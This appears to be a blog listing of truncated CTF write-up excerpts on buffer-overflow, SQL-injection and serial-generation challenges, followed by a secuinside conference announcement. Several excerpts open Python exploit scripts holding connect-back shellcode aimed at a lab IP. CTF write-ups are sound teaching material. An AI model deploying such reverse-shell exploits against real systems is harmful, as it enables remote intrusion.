Category : Pwnables
* file
Summary : simple remote buffer overflow

Binary Info.
[pwn3r@localhost rr200]$ file rr200
rr200: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), dynamically linked (uses shared libs), stripped

The main function daemonizes and then runs the client_callback function for each connecting client. (The function name is one I chose arbitrarily.) First, let's connect to the server.

[pwn3r@localhost rr200]$ nc 192.168.123.134 9999
Hans Brix? Oh no! ..
Category : Reversing
* file
Summary : bypass authentication on ELF binary by sql injection

Binary info.
[retro300@localhost ~]$ file retro300
retro300: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, stripped
[retro300@localhost ~]$ file auth.db
auth.db: SQLite 3.x database

int main()
{
    int sock_fd;
    sock_fd = sock_init(word..
exploit.py

#!/usr/bin/python
from socket import *
import time

def pack(data):
    res = ""
    for i in range(0,4):
        res = res + chr(data % 0x100)
        data = data / 0x100
    return res

HOST = "192.168.123.129"
PORT = 9999
SHELLCODE = \
"\x68\xc0\xa8\x7b\x83\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0" + \
"\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50" + \
"\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4..
exploit.py

#!/usr/bin/python
from socket import *
import time

def pack(data):
    res = ""
    for i in range(0,4):
        res = res + chr(data % 0x100)
        data = data / 0x100
    return res

HOST = "192.168.123.129"
PORT = 1127
SHELLCODE = \
"\x68\xc0\xa8\x7b\x83\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0" + \
"\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50" + \
"\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4..
Category : Pwnables
* file
Summary : overwriting max length of receiving data

exploit.py

#!/usr/bin/python
from socket import *
import time

def pack(data):
    res = ""
    for i in range(0,4):
        res = res + chr(data % 0x100)
        data = data / 0x100
    return res

HOST = "192.168.123.129"
PORT = 3555
SHELLCODE = \
"\x68\xc0\xa8\x7b\x83\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0" + \
"\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\..
Category : Coding , Reverse engineering
* binary
Summary : generate serial

[pwn3r@localhost ~]$ nc 192.168.0.13 8888
ZsIdTLcuTNYdJXa
pwn3r
Invalid router. Routing failed :(
[pwn3r@localhost ~]$ nc 192.168.0.13 8888
ZxBSKUqrwwYqezO
pwn3r
Time out :(
[pwn3r@localhost ~]$ nc 192.168.0.13 8888
KOkIhGSyESyOWfW
aaaaaaaaaaaaaaa WAN ssl
Your key is wrong :(

exploit.py

#!/usr/bin/python
from socket impor..
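The 1st secuinside conference, co-hosted by the joint hacking group h4ru and the Korea University Graduate School of Information Security, is being held. As part of the event, CTF qualifiers and finals will take place, with the finals held offline on the day of the conference. (Unfortunately, the qualifier date is exactly the same as my exam date :) ) First prize is a whopping 30 million won! That's a generous prize, haha. The event consists of a mentoring program and a conference. I'm not yet sure what the mentoring program is, but at the conference you can hear interesting talks from well-known hackers from Korea and abroad. Since this is the first time the conference is being held, I'm really looking forward to it. I definitely have to attend, haha.

URL : http://secuinside.com/secuinside.html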